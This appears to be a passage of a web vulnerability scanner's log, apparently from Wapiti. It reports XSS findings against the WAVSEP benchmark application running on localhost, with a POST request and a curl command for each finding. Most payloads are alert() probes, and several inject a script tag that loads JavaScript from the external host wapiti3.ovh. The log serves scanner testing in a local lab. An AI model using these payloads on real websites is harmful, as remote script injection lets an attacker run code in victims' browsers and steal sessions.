curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wg22nthg3u%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwprjjo043yz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwprjjo043yz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27ww0eh4uyt1%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27ww0eh4uyt1%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw6ihak8zsjz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw6ihak8zsjz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw61t9egj0ez.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw61t9egj0ez.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wh2jhcx9fe%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wh2jhcx9fe%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wh1squ9zct%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wh1squ9zct%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27w5rh0pf00e%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27w5rh0pf00e%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27w2o8rmbaya%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27w2o8rmbaya%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wg8703x46a%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wg8703x46a%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wut11xy78l%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wut11xy78l%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27w6bqj2waqz%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27w6bqj2waqz%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wbkvy5n4jl%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wbkvy5n4jl%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cimg%20src%3D.%20onerror%3Dalert%28%22wpk3qn92uj%22%29%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cimg%20src%3D.%20onerror%3Dalert%28%22wpk3qn92uj%22%29%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wjjagm522d%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wjjagm522d%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wjbeoxwa4s%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wjbeoxwa4s%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wytwq2jlwc%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wytwq2jlwc%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wuoc1g6dg1%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wuoc1g6dg1%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wadxq7jkmk%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wadxq7jkmk%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wr90kf0djb%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wr90kf0djb%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wj8ovg5ier%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wj8ovg5ier%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wr7idx7fq4%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wr7idx7fq4%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wk8mbmd60z%27%29%3C%2Fscript%3E
